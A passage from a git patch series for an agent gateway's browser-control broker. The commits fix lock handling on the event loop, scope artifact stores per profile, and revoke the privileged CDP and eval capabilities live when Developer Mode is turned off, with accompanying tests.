BrowserControlBroker(command_timeout=0.1) + identity = dict( + session_id="sess-1", + principal_id="principal-1", + transport_family="cloud-ticket-ws", + ) + assert broker.lane_registered(**identity) is False + + scope = ControllerScope( + principal_id="principal-1", + profile_id="default", + session_id="sess-1", + controller_id="ctrl-1", + browser_profile_id="bp-1", + transport_family="cloud-ticket-ws", + capabilities=frozenset({"browser_navigate"}), + ) + owner = object() + broker.attach(scope, lambda frame: None, owner=owner) + assert broker.lane_registered(**identity) is True + + broker.disconnect(scope, owner=owner) + # Offline controller: lane stays bound (fail closed), never legacy. + assert broker.lane_registered(**identity) is True + bound_scope = broker.scope_for_session(**identity) + assert bound_scope is not None + assert broker.select(bound_scope, "browser_navigate") is None + + def test_selected_controller_receives_immutable_arguments_and_context(): broker = FakeBroker( scope="scope-fixture", diff --git a/tools/browser_extension_router.py b/tools/browser_extension_router.py index 7c4cc6cbc6..f9cbecc305 100644 --- a/tools/browser_extension_router.py +++ b/tools/browser_extension_router.py @@ -147,6 +147,21 @@ def route_browser_tool( transport_family=transport_family, ) if scope is None: + # A stamped identity alone does not make the extension lane + # authoritative — authentication happens at transport auth, but the + # lane only BINDS when a controller actually registers for it. If no + # controller ever registered, generic callers keep the legacy + # backend. Once a lane registered (even if the controller is + # currently offline/ambiguous), fail closed: a "control this tab" + # session must never silently jump to an unrelated browser. + lane_bound = getattr(broker, "lane_registered", None) + if callable(lane_bound) and not lane_bound( + session_id=session_id, + task_id=task_id, + principal_id=principal_id, + transport_family=transport_family, + ): + return fallback() from gateway.browser_control_broker import ControllerUnavailable raise ControllerUnavailable( From 45078eb9413e87bbc3e0d007c58e58def4d7f27e Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Fri, 21 Aug 2026 18:52:22 +0530 Subject: [PATCH 017/161] fix(browser): offload broker lock acquisition off the event loop MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit attach/disconnect/detach acquire a per-controller threading.Lock that a worker-thread dispatch can hold for up to 10s while blocking on the event loop to transmit its command frame (run_coroutine_threadsafe + result(timeout=10)). Acquiring that lock synchronously from loop context (controller WS finally, frame handler, gateway WS teardown) could park the ENTIRE gateway event loop behind the send bridge — a deterministic multi-second global stall whenever controller teardown raced an in-flight command. All loop-context broker calls now go through asyncio.to_thread, matching the existing offload pattern for _close_sessions_for_transport. Surfaced during review of PR #85351. --- gateway/platforms/api_server.py | 15 ++++++++++++--- tui_gateway/ws.py | 10 +++++++++- 2 files changed, 21 insertions(+), 4 deletions(-) diff --git a/gateway/platforms/api_server.py b/gateway/platforms/api_server.py index f393ba8b8c..9620ba6ff2 100644 --- a/gateway/platforms/api_server.py +++ b/gateway/platforms/api_server.py @@ -3605,7 +3605,14 @@ class APIServerAdapter(BasePlatformAdapter): loop = asyncio.get_running_loop() _send = _browser_controller_ws_sender(ws, loop) - self._browser_control_broker.attach(scope, _send, owner=ws) + # attach/disconnect/detach acquire the controller's send_lock, which a + # worker-thread dispatch may hold while blocking on THIS loop to + # transmit its frame (run_coroutine_threadsafe + result(timeout=10)). + # Offload them so a teardown/attach racing an in-flight send parks a + # worker thread, never the event loop. + await asyncio.to_thread( + self._browser_control_broker.attach, scope, _send, owner=ws + ) try: async for msg in ws: if msg.type == web.WSMsgType.TEXT: @@ -3614,7 +3621,8 @@ class APIServerAdapter(BasePlatformAdapter): except Exception: continue if isinstance(frame, dict): - reply = self._handle_browser_control_frame( + reply = await asyncio.to_thread( + self._handle_browser_control_frame, scope, frame, owner=ws, @@ -3624,7 +3632,8 @@ class APIServerAdapter(BasePlatformAdapter): elif msg.type in (web.WSMsgType.CLOSE, web.WSMsgType.ERROR): break finally: - self._browser_control_broker.disconnect( + await asyncio.to_thread( + self._browser_control_broker.disconnect, scope, owner=ws, ) diff --git a/tui_gateway/ws.py b/tui_gateway/ws.py index 637b7f9e1f..1afaba0991 100644 --- a/tui_gateway/ws.py +++ b/tui_gateway/ws.py @@ -466,12 +466,20 @@ async def handle_ws( # A reconnect with the same stable identity may deliver a terminal # result for work already in flight; no new dispatch is admitted # while the controller is offline. + # + # Offloaded via to_thread: disconnect acquires the controller's + # send_lock, which a worker-thread dispatch may hold while blocking + # on THIS loop to transmit its frame (run_coroutine_threadsafe + + # result(timeout=10)). Acquiring it synchronously here would park + # the whole event loop behind that 10s send bridge. try: from gateway.browser_control_broker import ( get_browser_control_broker, ) - get_browser_control_broker().disconnect_owner(transport) + await asyncio.to_thread( + get_browser_control_broker().disconnect_owner, transport + ) except Exception: _log.exception("ws browser-controller disconnect failed peer=%s", peer) From 13f209d4fd6cd763041a6e3fa42a11daec968af4 Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Fri, 21 Aug 2026 19:01:25 +0530 Subject: [PATCH 018/161] refactor(browser): dedupe auth-flow names and sentinel identity MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - Rename the broker's TicketInvalid to ControllerTicketInvalid: the same exception name already exists in hermes_cli/dashboard_auth/ws_tickets.py and BOTH are caught in the same WS auth flow this feature touches — two unrelated same-named exception types in one blast radius invited a wrong except clause. - Import the 'server-internal' sentinel identity from its canonical definition (ws_tickets.INTERNAL_USER_ID/INTERNAL_PROVIDER) instead of re-declaring the strings; drift would have silently broken the internal-peer exclusion in _is_authenticated_identity. Surfaced during review of PR #85351. --- gateway/browser_control_broker.py | 12 ++++++------ gateway/platforms/api_server.py | 4 ++-- tests/gateway/test_browser_control_broker.py | 6 +++--- tui_gateway/methods_browser_control.py | 10 ++++------ 4 files changed, 15 insertions(+), 17 deletions(-) diff --git a/gateway/browser_control_broker.py b/gateway/browser_control_broker.py index c8a97fa8eb..2b32f0f1fc 100644 --- a/gateway/browser_control_broker.py +++ b/gateway/browser_control_broker.py @@ -22,7 +22,7 @@ Contract (each rule is exercised by tests/gateway/test_browser_control_broker.py (``secrets``-derived, >= 32 chars) plus an expiry derived from the injected clock; ``consume_ticket`` exchanges it exactly once for the :class:`ControllerScope` it was minted for, raising - :class:`TicketInvalid` for unknown, already-consumed, or expired values. + :class:`ControllerTicketInvalid` for unknown, already-consumed, or expired values. The ticket is the only cross-transport credential minted here; transports decide how to carry it. @@ -207,7 +207,7 @@ class BrowserControlError(Exception): """Base class for broker contract failures.""" -class TicketInvalid(BrowserControlError): +class ControllerTicketInvalid(BrowserControlError): """A registration ticket is unknown, already consumed, or expired.""" @@ -372,7 +372,7 @@ class BrowserControlBroker: def consume_ticket(self, value: str) -> ControllerScope: """Exchange a ticket for its scope, exactly once. - Raises :class:`TicketInvalid` for unknown, already-consumed, or + Raises :class:`ControllerTicketInvalid` for unknown, already-consumed, or expired tickets. The expiry check happens against the live clock at consume time, so a ticket that outlived its TTL can never be used. """ @@ -380,11 +380,11 @@ class BrowserControlBroker: with self._lock: record = self._tickets.get(value) if record is None: - raise TicketInvalid("unknown ticket") + raise ControllerTicketInvalid("unknown ticket") if record.consumed: - raise TicketInvalid("ticket already consumed") + raise ControllerTicketInvalid("ticket already consumed") if now > record.expires_at: - raise TicketInvalid("ticket expired") + raise ControllerTicketInvalid("ticket expired") record.consumed = True return record.scope diff --git a/gateway/platforms/api_server.py b/gateway/platforms/api_server.py index 9620ba6ff2..6f423534c4 100644 --- a/gateway/platforms/api_server.py +++ b/gateway/platforms/api_server.py @@ -138,7 +138,7 @@ from gateway.browser_control_broker import ( BROWSER_CONTROL_CAPABILITIES, BROWSER_CONTROL_DEVELOPER_CAPABILITIES, ControllerScope, - TicketInvalid, + ControllerTicketInvalid, browser_control_developer_mode, browser_control_protocol_supported, filter_browser_control_capabilities, @@ -3591,7 +3591,7 @@ class APIServerAdapter(BasePlatformAdapter): raise web.HTTPUnauthorized() try: scope = self._browser_control_broker.consume_ticket(ticket_value) - except TicketInvalid: + except ControllerTicketInvalid: raise web.HTTPUnauthorized() from None except Exception: logger.exception("browser-control WS ticket consumption failed") diff --git a/tests/gateway/test_browser_control_broker.py b/tests/gateway/test_browser_control_broker.py index 6f910f87e6..98affd2abd 100644 --- a/tests/gateway/test_browser_control_broker.py +++ b/tests/gateway/test_browser_control_broker.py @@ -7,7 +7,7 @@ from gateway.browser_control_broker import ( BrowserControlBroker, ControllerCancelled, ControllerScope, - TicketInvalid, + ControllerTicketInvalid, ) @@ -34,12 +34,12 @@ def test_registration_ticket_is_short_lived_single_use_and_identity_bound(): assert len(ticket.value) >= 32 assert ticket.expires_at == 130.0 assert broker.consume_ticket(ticket.value) == scope - with pytest.raises(TicketInvalid, match="unknown|consumed"): + with pytest.raises(ControllerTicketInvalid, match="unknown|consumed"): broker.consume_ticket(ticket.value) expired = broker.mint_ticket(scope) now[0] = 131.0 - with pytest.raises(TicketInvalid, match="expired"): + with pytest.raises(ControllerTicketInvalid, match="expired"): broker.consume_ticket(expired.value) diff --git a/tui_gateway/methods_browser_control.py b/tui_gateway/methods_browser_control.py index 65409ee69f..abd7afa951 100644 --- a/tui_gateway/methods_browser_control.py +++ b/tui_gateway/methods_browser_control.py @@ -41,6 +41,10 @@ from gateway.browser_control_broker import ( browser_control_protocol_supported, filter_browser_control_capabilities, ) +from hermes_cli.dashboard_auth.ws_tickets import ( + INTERNAL_PROVIDER as _INTERNAL_PROVIDER, + INTERNAL_USER_ID as _INTERNAL_USER_ID, +) from .method_ctx import HandlerRegistry @@ -57,12 +61,6 @@ _CLOUD_TRANSPORT_FAMILY = "cloud-ticket-ws" #: JSON-RPC error code for identity / session / flag denials (forbidden). _ERR_FORBIDDEN = 4403 -#: Identity recorded for server-spawned WS clients (see -#: ``hermes_cli.dashboard_auth.ws_tickets``) — never allowed to act as a -#: browser controller. -_INTERNAL_USER_ID = "server-internal" -_INTERNAL_PROVIDER = "server-internal" - def _is_authenticated_identity(identity: object) -> bool: """True for a server-minted, non-internal ``{user_id, provider}`` identity.""" From 652e0a72d177eaa53fb53ec777e3f532438cf6a8 Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Fri, 21 Aug 2026 19:02:09 +0530 Subject: [PATCH 019/161] perf(browser): read the feature flags via load_config_readonly browser_control_enabled()/browser_control_developer_mode() run on every browser tool call and inside every check_fn evaluation (uncached for bound sessions). Both are pure reads of nested dicts; load_config()'s defensive deepcopy (~135us/call) is wasted there. Same pattern as the other read-only config probes. Surfaced during review of PR #85351. --- gateway/browser_control_broker.py | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/gateway/browser_control_broker.py b/gateway/browser_control_broker.py index 2b32f0f1fc..bde78063d6 100644 --- a/gateway/browser_control_broker.py +++ b/gateway/browser_control_broker.py @@ -154,9 +154,12 @@ def browser_control_developer_mode(config: Optional[dict] = None) -> bool: """ if config is None: try: - from hermes_cli.config import load_config + # Read-only flag probe on every browser tool call / check_fn + # evaluation: skip load_config()'s defensive deepcopy (~135us); + # this function only reads nested dicts and never mutates. + from hermes_cli.config import load_config_readonly - config = load_config() + config = load_config_readonly() except Exception: return False if not isinstance(config, dict): @@ -1007,9 +1010,12 @@ def browser_control_enabled(config: Optional[dict] = None) -> bool: """Return the explicit browser-control feature flag (disabled by default).""" if config is None: try: - from hermes_cli.config import load_config + # Read-only flag probe on every browser tool call / check_fn + # evaluation: skip load_config()'s defensive deepcopy (~135us); + # this function only reads nested dicts and never mutates. + from hermes_cli.config import load_config_readonly - config = load_config() + config = load_config_readonly() except Exception: return False if not isinstance(config, dict): From 847289864de158b31a80153a69f3e1460352574e Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Fri, 21 Aug 2026 22:09:54 +0530 Subject: [PATCH 020/161] fix(browser): make the artifact boundary compose end-to-end and scope stores per profile MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Addresses both merge blockers from @andrexibiza's review of #85351: 1. HTTP-uploaded artifacts could never be consumed by broker dispatch: artifact_scope_key hashed (principal, session, family), the HTTP routes store with an EMPTY session (API-key auth has no server session) while broker validation carries a session-bearing ControllerScope — every real upload->dispatch journey died with ArtifactScopeMismatch (reproduced before fixing). Canonical ownership is now principal/transport-family (documented in the scope-key docstring); ids stay unguessable server-minted 32-hex and downloads one-shot. New composition regression: HTTP-shape upload -> registered controller scope -> broker artifact dispatch, mutation-checked (re-adding session to the key makes it fail). 2. The 'profile-scoped' artifact store was first-profile-wins process state: one adapter-level singleton pinned profile B to profile A's physical root on multiplex listeners (same frozen-handle class as #88734). Stores are now cached by resolved profile, and the broker selects the store from the controller scope's profile_id (default-slot fallback preserves single-profile/test behaviour). New A/B multiplex regression proves distinct physical roots regardless of touch order. Also documents the advertised ticket_expires_at as best-effort wall clock (broker enforces expiry monotonically) per review feedback. --- gateway/browser_control_artifacts.py | 26 +++---- gateway/browser_control_broker.py | 46 +++++++++--- gateway/platforms/api_server.py | 41 +++++++---- .../gateway/test_browser_control_artifacts.py | 71 +++++++++++++++++++ 4 files changed, 151 insertions(+), 33 deletions(-) diff --git a/gateway/browser_control_artifacts.py b/gateway/browser_control_artifacts.py index fd07af1234..394d96dfb5 100644 --- a/gateway/browser_control_artifacts.py +++ b/gateway/browser_control_artifacts.py @@ -157,23 +157,23 @@ class ArtifactReceipt: def artifact_scope_key(scope: Any) -> str: """Derive the stable scope key an artifact is bound to. - Only server-derived identity fields participate: principal (mandatory), - plus session and transport family when the caller resolved them - (mirroring the broker's exact-identity contract). Capabilities and - optional ids are intentionally excluded so a reconnect that refreshes - the same controller keeps its artifacts. - - The API-server artifact routes authenticate by API key and bind to the - derived principal; the broker additionally binds to the full - controller scope. A principal-only key and a full controller key - never collide because the digest input differs. + Only server-derived identity fields participate: principal (mandatory) + plus transport family. ``session_id`` is deliberately EXCLUDED: the HTTP + artifact routes authenticate by API key and can never resolve a server + session, while broker dispatch always carries a session-bearing + ControllerScope — including the session would make the two halves of the + intended journey (HTTP upload → broker artifact dispatch) hash to + different keys and never compose. Artifacts are therefore + principal/transport-family owned; ids are unguessable server-minted + 32-hex and downloads are one-shot, so cross-session reuse within one + authenticated principal is by design. Capabilities and optional ids are + likewise excluded so a reconnect that refreshes the same controller + keeps its artifacts. """ principal = "" - session = "" family = "" try: principal = str(getattr(scope, "principal_id", "") or "") - session = str(getattr(scope, "session_id", "") or "") family = str(getattr(scope, "transport_family", "") or "") except Exception: pass @@ -181,7 +181,7 @@ def artifact_scope_key(scope: Any) -> str: # Fail closed: an artifact can only be minted for an authenticated # principal. raise ArtifactError("artifact scope must carry a resolved principal") - material = f"{principal}\x00{session}\x00{family}".encode("utf-8") + material = f"{principal}\x00{family}".encode("utf-8") return hashlib.sha256(material).hexdigest() diff --git a/gateway/browser_control_broker.py b/gateway/browser_control_broker.py index bde78063d6..5d4c860fde 100644 --- a/gateway/browser_control_broker.py +++ b/gateway/browser_control_broker.py @@ -341,17 +341,46 @@ class BrowserControlBroker: if developer_mode is None: developer_mode = browser_control_developer_mode() self._developer_mode = developer_mode is True - self._artifact_store: Any = None + # Artifact stores keyed by resolved profile id; ``None`` is the + # default/unscoped store (tests, single-profile hosts). A multiplex + # listener attaches one store per profile so profile A touching the + # artifact route first can never pin profile B to A's physical root. + self._artifact_stores: Dict[Optional[str], Any] = {} - def attach_artifact_store(self, store: Any) -> None: - """Attach the process artifact store for "approved artifact id only". + def attach_artifact_store( + self, store: Any, *, profile_id: Optional[str] = None + ) -> None: + """Attach an artifact store for "approved artifact id only". ``store`` must expose ``validate(artifact_id, *, scope) -> receipt`` raising the artifacts module's :class:`ArtifactError` subclasses. - None clears the reference; dispatching an artifact action without a - store fails closed. + ``profile_id`` scopes the store to one profile on multiplex hosts; + ``None`` registers the default store. ``store=None`` clears that + slot; dispatching an artifact action without a resolvable store + fails closed. """ - self._artifact_store = store + if store is None: + self._artifact_stores.pop(profile_id, None) + return + self._artifact_stores[profile_id] = store + + def _artifact_store_for_scope(self, scope: "ControllerScope") -> Any: + """Select the artifact store for one controller scope. + + Prefers the exact profile-scoped store, falling back to the default + (``None``) slot so single-profile hosts and existing tests keep the + historical one-store behaviour. + """ + profile = getattr(scope, "profile_id", None) or None + store = self._artifact_stores.get(profile) + if store is not None: + return store + return self._artifact_stores.get(None) + + @property + def _artifact_store(self) -> Any: + """Back-compat view of the default artifact store (tests).""" + return self._artifact_stores.get(None) @property def developer_mode(self) -> bool: @@ -831,7 +860,8 @@ class BrowserControlBroker: traversal, expiry, checksum, or scope mismatch all surface as :class:`ControllerRejected` before any frame is emitted. """ - if self._artifact_store is None: + store = self._artifact_store_for_scope(scope) + if store is None: raise ControllerRejected( f"{action} requires an attached artifact store" ) @@ -839,7 +869,7 @@ class BrowserControlBroker: if not isinstance(artifact_id, str) or not artifact_id.strip(): raise ControllerRejected(f"{action} requires a non-empty artifact_id") try: - self._artifact_store.validate(artifact_id.strip(), scope=scope) + store.validate(artifact_id.strip(), scope=scope) except ControllerRejected: raise except Exception as exc: diff --git a/gateway/platforms/api_server.py b/gateway/platforms/api_server.py index 6f423534c4..0450e64a54 100644 --- a/gateway/platforms/api_server.py +++ b/gateway/platforms/api_server.py @@ -1583,10 +1583,11 @@ class APIServerAdapter(BasePlatformAdapter): # and command lifecycle shared with the dashboard Gateway transport. This adapter only maps HTTP registration and the # controller WebSocket onto the broker; it owns no broker state. self._browser_control_broker = get_browser_control_broker() - # One-shot artifact transport (Phase 8 Task 29). Lazy store + limiter - # are created on first authenticated artifact use; tests inject their - # own store/limiter via _inject_browser_control_artifacts(). - self._browser_control_artifacts: Optional[ArtifactStore] = None + # One-shot artifact transport (Phase 8 Task 29). Lazy per-profile + # stores + limiter are created on first authenticated artifact use; + # tests inject their own store/limiter via + # _inject_browser_control_artifacts(). + self._browser_control_artifacts: Dict[str, ArtifactStore] = {} self._browser_control_artifact_limiter: Optional[ArtifactRateLimiter] = None def active_agent_work_count(self) -> int: @@ -3533,6 +3534,9 @@ class APIServerAdapter(BasePlatformAdapter): { "protocol_version": _BROWSER_CONTROL_PROTOCOL_VERSION, "ticket": ticket.value, + # Best-effort wall-clock projection for clients; the broker + # enforces expiry on its monotonic clock, so after an NTP + # step trust ticket_expires_in_seconds, not this absolute. "ticket_expires_at": time.time() + ticket_ttl, "ticket_expires_in_seconds": ticket_ttl, "ws_path": "/v1/browser-control/ws", @@ -3761,11 +3765,17 @@ class APIServerAdapter(BasePlatformAdapter): The store root lives under the profile's data directory (``/plugin-data/.../artifacts``-style controlled root), - so artifacts never escape the profile boundary. The root itself is - created on first use; TTL cleanup runs on every store/load/prune. + so artifacts never escape the profile boundary. Stores are cached + BY RESOLVED PROFILE — on a multiplex listener, profile A touching + the artifact route first must never pin profile B to A's physical + root (same frozen-handle class as the per-profile session-storage + fix in #88734). The root itself is created on first use; TTL + cleanup runs on every store/load/prune. """ - if self._browser_control_artifacts is not None: - return self._browser_control_artifacts + profile_key = str(profile or "default") + store = self._browser_control_artifacts.get(profile_key) + if store is not None: + return store try: from hermes_cli.profiles import get_profile_dir @@ -3788,12 +3798,14 @@ class APIServerAdapter(BasePlatformAdapter): allowed_mime_types=DEFAULT_ALLOWED_MIME_TYPES, ) store.prune_expired() - self._browser_control_artifacts = store + self._browser_control_artifacts[profile_key] = store # Share the store with the broker so artifact actions dispatched to a # controller validate their artifact reference against the same - # controlled root ("approved artifact id only"). + # profile's controlled root ("approved artifact id only"). try: - self._browser_control_broker.attach_artifact_store(store) + self._browser_control_broker.attach_artifact_store( + store, profile_id=profile_key + ) except Exception: logger.debug("could not attach artifact store to broker", exc_info=True) return store @@ -3811,9 +3823,14 @@ class APIServerAdapter(BasePlatformAdapter): self, store: Optional[ArtifactStore], limiter: Optional[ArtifactRateLimiter] = None, + *, + profile: str = "default", ) -> None: """Inject a store/limiter (tests, diagnostics).""" - self._browser_control_artifacts = store + if store is None: + self._browser_control_artifacts.pop(profile, None) + else: + self._browser_control_artifacts[profile] = store if limiter is not None: self._browser_control_artifact_limiter = limiter diff --git a/tests/gateway/test_browser_control_artifacts.py b/tests/gateway/test_browser_control_artifacts.py index 10597adb8b..51624209f3 100644 --- a/tests/gateway/test_browser_control_artifacts.py +++ b/tests/gateway/test_browser_control_artifacts.py @@ -589,3 +589,74 @@ def test_route_table_advertises_artifact_routes(): routes = {(method, path) for method, path, _handler in adapter._http_route_table()} assert ("POST", "/v1/artifacts/upload") in routes assert ("GET", "/v1/artifacts/download/{artifact_id}") in routes + + +def test_http_uploaded_artifact_composes_with_broker_dispatch(tmp_path): + """The real journey: HTTP upload (no session) -> broker artifact dispatch. + + Regression for the scope-key mismatch review blocker: the HTTP artifact + routes can never resolve a server session, so artifact ownership is + principal/transport-family scoped and a session-bearing ControllerScope + must validate the same artifact. + """ + store = ArtifactStore(tmp_path / "root") + # Upload-side scope: what api_server's facade carries (empty session). + receipt = store.store( + TEXT_BYTES, + filename="note.txt", + content_type="text/plain", + scope=_Scope(session=""), + ) + + broker = BrowserControlBroker() + broker.attach_artifact_store(store) + scope = _broker_scope( + capabilities=frozenset({"browser_artifact_upload", "controller.noop"}) + ) + + def send(frame): + broker.complete( + frame["params"]["command_id"], ok=True, result={"ok": True} + ) + + broker.attach(scope, send) + result = broker.dispatch( + scope, + action="browser_artifact_upload", + arguments={"artifact_id": receipt.artifact_id}, + ) + assert result == {"ok": True} + + # Cross-principal / cross-family access still fails closed. + with pytest.raises(ArtifactScopeMismatch): + store.validate(receipt.artifact_id, scope=_Scope(principal="other")) + with pytest.raises(ArtifactScopeMismatch): + store.validate(receipt.artifact_id, scope=_Scope(session="", family="remote-api")) + + +def test_multiplex_profiles_get_distinct_stores_regardless_of_touch_order(tmp_path, monkeypatch): + """Profile A touching the artifact route first must not pin profile B.""" + import gateway.platforms.api_server as api_server_mod + + adapter = _adapter() + monkeypatch.setattr( + "hermes_cli.profiles.get_profile_dir", + lambda profile: str(tmp_path / f"home-{profile}"), + ) + + store_a = adapter._artifact_store_for("profile-a") + store_b = adapter._artifact_store_for("profile-b") + assert store_a is not store_b + assert str(store_a.root) != str(store_b.root) + assert "home-profile-a" in str(store_a.root) + assert "home-profile-b" in str(store_b.root) + # Repeat lookups return the same cached store per profile. + assert adapter._artifact_store_for("profile-a") is store_a + assert adapter._artifact_store_for("profile-b") is store_b + + # The broker resolves each profile's own store from the controller scope. + broker = adapter._browser_control_broker + scope_a = _broker_scope(profile_id="profile-a") + scope_b = _broker_scope(profile_id="profile-b") + assert broker._artifact_store_for_scope(scope_a) is store_a + assert broker._artifact_store_for_scope(scope_b) is store_b From 23a64a97ec928945b49389e8dfb6d06a11cb0132 Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Fri, 21 Aug 2026 22:27:44 +0530 Subject: [PATCH 021/161] fix(api): correct _handle_browser_control_frame return annotation The frame handler returns reply dicts (heartbeat/detach acks) that the WS reader loop sends back; the -> None annotation was the only new ty diagnostic vs origin/main. --- gateway/platforms/api_server.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/gateway/platforms/api_server.py b/gateway/platforms/api_server.py index 0450e64a54..afba3352f6 100644 --- a/gateway/platforms/api_server.py +++ b/gateway/platforms/api_server.py @@ -3649,7 +3649,7 @@ class APIServerAdapter(BasePlatformAdapter): frame: dict, *, owner: Any = None, - ) -> None: + ) -> Optional[dict]: """Apply one controller→broker frame with exact-scope checks.""" method = frame.get("method") params = frame.get("params") From c16c262d01c192850cabd9b6510beb7b23486b3e Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Fri, 21 Aug 2026 22:54:04 +0530 Subject: [PATCH 022/161] fix(browser): honor live Developer Mode for privileged capability selection MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The global broker snapshotted browser.extension_control.developer_mode once at construction, so flipping it OFF in config did not revoke raw CDP/eval from already-attached controllers until process restart — a revocation failure at the highest-privilege browser surface (blocker 3 of andrexibiza's #91535 review). select() now consults the live config on every privileged selection (explicit bool still pins for tests); off->on also unlocks without restart. Regression test drives both directions against an attached controller. Also drops the dead back-compat _artifact_store property (zero readers). --- gateway/browser_control_broker.py | 34 +++++++---- .../gateway/test_browser_control_artifacts.py | 59 +++++++++++++++++++ 2 files changed, 80 insertions(+), 13 deletions(-) diff --git a/gateway/browser_control_broker.py b/gateway/browser_control_broker.py index 5d4c860fde..d794f0999d 100644 --- a/gateway/browser_control_broker.py +++ b/gateway/browser_control_broker.py @@ -335,18 +335,28 @@ class BrowserControlBroker: self._controllers: Dict[ControllerScope, _Controller] = {} self._pending: Dict[str, _PendingCommand] = {} # Developer Mode gates privileged capabilities (browser_evaluate, - # browser_cdp). None defers to the live config on every dispatch so - # a mid-process config change is honored without restart; an explicit - # bool pins the gate for tests and multi-tenant hosts. - if developer_mode is None: - developer_mode = browser_control_developer_mode() - self._developer_mode = developer_mode is True + # browser_cdp). None defers to the live config on every selection so + # a mid-process config change is honored without restart — including + # REVOKING raw CDP/eval from already-attached controllers; an + # explicit bool pins the gate for tests and multi-tenant hosts. + self._developer_mode_pinned: Optional[bool] = ( + None if developer_mode is None else developer_mode is True + ) # Artifact stores keyed by resolved profile id; ``None`` is the # default/unscoped store (tests, single-profile hosts). A multiplex # listener attaches one store per profile so profile A touching the # artifact route first can never pin profile B to A's physical root. self._artifact_stores: Dict[Optional[str], Any] = {} + def _developer_mode_now(self) -> bool: + """Current Developer Mode authority (live config unless pinned).""" + if self._developer_mode_pinned is not None: + return self._developer_mode_pinned + try: + return browser_control_developer_mode() + except Exception: + return False + def attach_artifact_store( self, store: Any, *, profile_id: Optional[str] = None ) -> None: @@ -377,15 +387,10 @@ class BrowserControlBroker: return store return self._artifact_stores.get(None) - @property - def _artifact_store(self) -> Any: - """Back-compat view of the default artifact store (tests).""" - return self._artifact_stores.get(None) - @property def developer_mode(self) -> bool: """Whether privileged capabilities may be selected/dispatched.""" - return self._developer_mode + return self._developer_mode_now() # ------------------------------------------------------------------ # Registration tickets @@ -534,10 +539,13 @@ class BrowserControlBroker: Privileged capabilities (``browser_evaluate``, ``browser_cdp``) are additionally gated on Developer Mode: with the gate off they are never selectable, even when a controller somehow negotiated them. + The gate consults the LIVE flag on every selection (unless pinned at + construction), so flipping ``developer_mode`` off in config revokes + raw CDP/eval from already-attached controllers without a restart. """ if ( capability in BROWSER_CONTROL_DEVELOPER_CAPABILITIES - and not self._developer_mode + and not self._developer_mode_now() ): return None with self._lock: diff --git a/tests/gateway/test_browser_control_artifacts.py b/tests/gateway/test_browser_control_artifacts.py index 51624209f3..7f71905c63 100644 --- a/tests/gateway/test_browser_control_artifacts.py +++ b/tests/gateway/test_browser_control_artifacts.py @@ -660,3 +660,62 @@ def test_multiplex_profiles_get_distinct_stores_regardless_of_touch_order(tmp_pa scope_b = _broker_scope(profile_id="profile-b") assert broker._artifact_store_for_scope(scope_a) is store_a assert broker._artifact_store_for_scope(scope_b) is store_b + + +def test_developer_mode_flip_revokes_privileged_selection_live(monkeypatch): + """Turning developer_mode off in config revokes CDP/eval from an + already-attached controller without a process restart (and on->off + the reverse: enabling unlocks selection for a new negotiation).""" + import gateway.browser_control_broker as broker_mod + + flag = {"on": True} + monkeypatch.setattr( + broker_mod, "browser_control_developer_mode", lambda config=None: flag["on"] + ) + broker = BrowserControlBroker() # developer_mode=None -> live config + scope = _broker_scope( + capabilities=frozenset({"browser_evaluate", "browser_cdp", "controller.noop"}) + ) + broker.attach(scope, lambda _frame: None) + + assert broker.select(scope, "browser_evaluate") is not None + # Revocation: flip the live flag off — the attached controller loses + # privileged selection immediately. + flag["on"] = False + assert broker.select(scope, "browser_evaluate") is None + assert broker.select(scope, "browser_cdp") is None + # Base capabilities are unaffected by the developer gate. + assert broker.select(scope, "controller.noop") is not None + # And back on: selection resumes without any rebind. + flag["on"] = True + assert broker.select(scope, "browser_cdp") is not None + # Explicit pin still wins over live config (test/multi-tenant contract). + pinned = BrowserControlBroker(developer_mode=False) + pinned.attach(scope, lambda _frame: None) + assert pinned.select(scope, "browser_evaluate") is None + + +def test_store_construction_sweeps_orphan_files_from_previous_process(tmp_path): + """Files left by a dead process (unreachable, past advertised TTL) are + removed when a fresh store opens the same root.""" + root = tmp_path / "root" + store = ArtifactStore(root) + receipt = store.store( + TEXT_BYTES, filename="note.txt", content_type="text/plain", scope=_Scope() + ) + orphan = root / receipt.artifact_id + assert orphan.exists() + stale_tmp = root / "deadbeef.tmp" + stale_tmp.write_bytes(b"partial") + unrelated = root / "README" + unrelated.write_bytes(b"keep me") + + # Simulate restart: a new store over the same root has an empty index. + fresh = ArtifactStore(root) + assert not orphan.exists() + assert not stale_tmp.exists() + assert unrelated.exists() # non-artifact-shaped names untouched + assert fresh.count() == 0 + # New store works normally afterwards. + fresh.store(TEXT_BYTES, filename="new.txt", content_type="text/plain", scope=_Scope()) + assert fresh.count() == 1 From 2cb8794f7a061fdd6310e3d45dc53c4d371c52d4 Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Fri, 21 Aug 2026 22:54:04 +0530 Subject: [PATCH 023/161] fix(browser): sweep orphan artifact files at store construction MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Artifact receipts live only in memory, so files left behind by a dead process were unreachable but persisted forever despite the advertised 300s TTL — a retention failure on the surface meant to be ephemeral (blocker 4 of andrexibiza's #91535 review). A fresh ArtifactStore now removes every artifact-id-shaped file and stale *.tmp with no index entry (at construction the index is empty, so all such files are orphans). Non-artifact-shaped names are untouched. Regression: store -> recreate store over same root 